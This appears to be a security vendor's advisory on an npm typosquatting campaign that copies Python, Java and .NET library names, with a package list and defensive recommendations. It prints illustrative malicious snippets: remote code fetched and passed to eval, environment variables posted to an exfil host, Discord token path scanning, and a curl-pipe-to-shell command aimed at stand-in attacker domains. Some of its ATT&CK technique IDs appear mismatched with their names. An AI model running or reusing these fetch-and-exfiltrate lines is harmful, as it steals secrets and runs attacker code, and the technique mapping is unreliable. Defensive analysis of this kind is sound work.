NPM targeted by malware campaign mimicking familiar library names

Developers looking for familiar packages from other programming languages are increasingly falling victim to malicious attacks.

Summary#

The Socket threat research team uncovered a coordinated malware operation across the NPM ecosystem. The actor behind the campaign published dozens of malicious NPM packages that mimic well-known Python, Java, C++, .NET, and Node.js libraries. This tactic may specifically target developers familiar with multiple programming languages, tricking them into installing malicious packages due to familiar-sounding package names, which appear unexpectedly in the npm registry instead of their original ecosystem.

Packages identified as part of this campaign contain obfuscated code designed to bypass security measures, execute malicious scripts, exfiltrate sensitive data, and maintain persistence on affected systems.

Although these packages list different maintainers, analysis revealed that they share infrastructure, use identical obfuscated payloads, and point to the same IP address 8[.]152[.]163[.]60 confirming a single, coordinated threat actor targeting developers across ecosystems. The IP address was traced back to an address located in the Beijing region of China associated with Alibaba Cloud (Singapore) Private Limited.

Cross-Ecosystem Typosquatting#

This attacker employed cross-ecosystem typosquatting — using familiar names from other package ecosystems to fool developers.

The following table shows some of the packages that were identified as part of this campaign alongside the corresponding legitimate libraries from other package ecosystems:

The intent of the attacker was likely to:

• Exploit multi-language developers who may accidentally install a familiar-sounding library from the wrong ecosystem
• Trick CI/CD systems into automatic installation
• Harvest secrets, tokens, and environment data upon install or usage

Behavior & Indicators#

• Obfuscated main.js payloads in all packages
• Execution at install-time via postinstall
• Beaconing to hardcoded IP addresses
• Reconnaissance logic for host metadata
• Some variants attempt credential access or environment exfiltration

Understanding the Malicious Pattern Observed

All packages exhibit highly similar obfuscated logic that ultimately performs data exfiltration or remote code execution. Below is a step-by-step explanation with code snippets.

1. Suspicious Eval-like Pattern

(function() {
	const _0xabc = ["charCodeAt", ...]; // Obfuscated string array
	(function(_0x1a2, _0x3f4f) {
		while (true) {
			try {
				const _0xresult = parseInt(...); // Junk math
				if (_0xresult === _0x3f4f) break;
				else _0x1a2.push(_0x1a2.shift());
			} catch (e) {
				_0x1a2.push(_0x1a2.shift());
			}
		}
	})(_0xabc, 123456);
})();

This is a classic example of obfuscation using arrays and numeric manipulation. This technique slows down detection by static analysis tools.

2. Remote Code Fetch and Execution

const https = require('https');
https.get('<https://malicious-domain.tld/payload.js>', res => {
	let data = '';
	res.on('data', chunk => data += chunk);
	res.on('end', () => {
		eval(data); // Executes attacker-controlled code
	});
});

This snippet executes arbitrary code fetched over the network, making the package a remote access Trojan (RAT).

3. Environment Variable Theft

const fs = require('fs');
const os = require('os');

const envDump = JSON.stringify(process.env);
require('https').request({
	hostname: 'exfil-server.com',
	path: '/env',
	method: 'POST',
	headers: {
		'Content-Type': 'application/json'
	}
}, res => {}).end(envDump);

Here, the malicious code collects environment variables (which may include secrets, API keys, credentials) and sends them to a hardcoded attacker server.

4. Discord Token Grabber Behavior

In some packages like logdna-agent and vue-ssr-devtools, Discord token grabbing logic mimics known malware patterns:

const paths = [
	`${process.env.APPDATA}/Discord/Local Storage/leveldb`,
	...
];

This code traverses Discord directories to grab tokens, a known pattern in Discord malware campaigns.

5. File System Snooping / Persistence

const cp = require('child_process');
cp.exec('curl <https://attacker.com/install.sh> | sh');

Last but not least, packages contain code that attempts persistence or lateral movement via installation of remote shell scripts.

Summary of Malicious Techniques

• Obfuscation: Hides the logic to bypass security analysis and detection.
• Remote Eval: Executes downloaded JavaScript via eval() to run arbitrary code remotely.
• Exfiltration: Sends sensitive data (like environment variables and tokens) to attacker-controlled domains.
• Discord Credential Grab: Targets Discord token storage to steal credentials.
• Persistence via Shell: Downloads and executes shell scripts to maintain or escalate control over the system.

Full List of Malicious Packages#

Each package links directly to its Socket analysis page, showing the main.js file and behavior summary:

• reactotron-mobx
• jade-browserify
• beautifulsoup4
• apache-httpclient
• directx
• sharpgl
• windows-api-codec-pack
• commons-net
• slimdx
• vim-refactor
• vue-ssr-devtools
• opentk
• arduinounit
• dayjs-plugin-duration
• pdfplumber
• node-jwt-simple
• platformio
• hungarian-algorithm
• logdna-agent
• scheme-latin-1-transcoder
• jna
• wdio-healenium-service
• josson
• typescript-plugin-some-plugin
• cordova-plugin-permissions
• sails-mssql-adapter
• fanotify
• meteor-roles
• seaborn
• concurrent-hashmap
• slf4j-api-js
• arduino-mock
• swagger2-postman2
• mock-arduino
• psalm
• compiletest_rs
• jetty-quic
• shaderc
• kidding
• your-published-package
• haml-jst-loader
• vue-highcharts-official
• vite-plugin-remove
• vite-plugin-node-modules-polyfills
• istanbul-reporter-lcov
• make-plural-rules

Recommendations#

• Audit your recent dependencies in package.json and package-lock.json
• Use Socket.dev for real-time security insights
• Block suspicious packages with a proxy registry or allowlist policy
• Train developers to recognize typosquatting and package impersonation

MITRE ATT&CK - Key Tactics & Techniques

• T1071.001: Application Layer Protocol - Fetching malicious code via HTTPS.
• T1059.001: PowerShell - Executing commands through script downloads.
• T1105: Ingress Tool Transfer - Transferring tools from remote locations.
• T1005: Data from Local System - Collecting system data and credentials.
• T1083: File and Directory Discovery - Scanning system directories for sensitive files.
• T1033: System Owner/User Discovery - Targeting specific user/system environments.
• T1070.001: File Deletion - Removing traces of the attack.
• T1027: Obfuscation - Hiding malicious code to avoid detection.
• T1029: Scheduled Task/Job - Maintaining persistence with scheduled tasks.
• T1070.004: Permissions Modification - Modifying file permissions to maintain control.
• T1041: Exfiltration Over C2 - Exfiltrating data over command and control channels.
• T1030: Data Transfer Size Limits - Evading detection by exfiltrating small chunks.
• T1055: Process Injection - Injecting malicious code into legitimate processes.
• T1082: System Information Discovery - Gathering system info and credentials.

Socket Research Team

Dhanesh Dodia

Sambarathi Sai

Dwijay Chintakunta